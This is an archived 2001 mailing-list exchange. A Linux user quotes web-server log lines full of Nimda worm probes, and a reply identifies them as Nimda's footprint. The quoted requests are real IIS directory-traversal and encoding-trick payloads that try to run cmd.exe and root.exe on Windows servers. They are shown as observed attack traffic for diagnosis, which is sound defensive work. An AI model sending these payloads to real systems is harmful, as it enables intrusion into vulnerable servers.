Re: [SLUG] WHAT is THIS?

From: Andrew Wyatt (awyatt@intergate.cx)
Date: Tue Oct 02 2001 - 06:24:37 EDT


Ahhh, that is the good 'ole Nimda footprint.

Andrew

On Monday 01 October 2001 10:33 pm, you wrote:
> Snipped from my httpd log file: The log file is littered with them from
> IPs that appear to be all over the world. Any ideas? I am thankful I am
> running linux, which would account for 404 errors.
>
> 24.95.6.159 - - [01/Oct/2001:22:05:23 -0400] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 293
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 291
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
> 24.95.175.59 - - [01/Oct/2001:22:24:37 -0400] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.95.175.59 - - [01/Oct/2001:22:24:37 -0400] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 332
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 332
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
>y stem32/cmd.exe?/c+dir HTTP/1.0" 404 348
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315

-- 
cat MCSE | sed s/MCSE/RHCE/g>MCSE && kill -9 `ps -ef | grep MSFT | awk 
'{print $2}'` && mail -s "Another one bites the dust" bill.gates@microsoft.com

-----BEGIN GEEK CODE BLOCK----- Version: 3.1 GAT d+@ s+ a- C++++ ULBH++++$ P++++$ L++++$ E--- W+++ N+++ o+++ K- w---$ O M+ V- PS-- PE+ Y- PGP- t+++@ 5- X++ R* tv-- b++++ DI+++ D++ G++ e* h++ r+++ z** ------END GEEK CODE BLOCK------



This archive was generated by hypermail 2.1.3 : Fri Aug 01 2014 - 20:36:26 EDT